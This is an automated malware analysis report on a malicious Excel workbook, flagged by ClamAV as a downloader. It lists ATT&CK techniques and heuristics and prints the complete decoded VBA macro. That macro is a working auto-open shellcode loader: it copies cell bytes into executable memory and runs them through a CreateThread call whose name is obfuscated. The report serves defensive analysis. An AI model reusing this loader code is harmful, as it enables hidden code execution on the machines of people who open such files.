Verdict: MALICIOUS
Risk Score: 164

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is an Excel document containing VBA macros with AutoOpen and Workbook_Open entry points, both of which call Auto_Open. The VBA code allocates memory with VirtualAlloc, copies bytes into it, and then calls the CreateThread API (its name assembled from string fragments and invoked through Application.Evaluate) to execute arbitrary code, most likely a second-stage payload. This is further supported by the ClamAV detection, which classifies the file as a downloader.
Heuristics (5)

- ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings). Document contains a VBA project; VBA macros present
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script: `Sub AutoOpen()` / `Auto_Open` / `End Sub`
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched lines in script: `Sub Workbook_Open()` / `Auto_Open` / `End Sub`
- Auto_Open macro (low, OLE_VBA_AUTO). Matched lines in script: `Sub Auto_Open()` / `Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long`
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1804 bytes | 6e873772df33264493d318b9e7d191aebdcb6398a57c629d1e257185eb61f286 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 19968 bytes | 25f1e128fb3c50264e33bfe921938fdea4a971a63c2fee0ba374492b62b9bcd3 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Module1"
Function VBA_Evaluate(Input_String As String)
Application.Volatile
VBA_Evaluate = Application.Evaluate(Input_String)
End Function
Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long
#If VBA7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#End If
n = Range("A1", Range("A1").End(xlDown)).Rows.Count
ReDim Hyeyhafxp(n)
For i = 0 To n
Hyeyhafxp(i) = Range("A1").Offset(i, 0)
Next i
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Dim p1 As String, p2 As String, p3 As String, p4 As String, p5 As String
p1 = "Cr"
p2 = "ea"
p3 = "teT"
p4 = "hre"
p5 = "ad"
VBA_Evaluate (p1 & p2 & p3 & p4 & p5 & "(0, 0, " & Xlbufvetp & ", 0, 0, 0)")
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```

Detection for vbaProject_00.bin:
- ClamAV: Doc.Downloader.Generic-6698421-0
- Obfuscation or payload: unlikely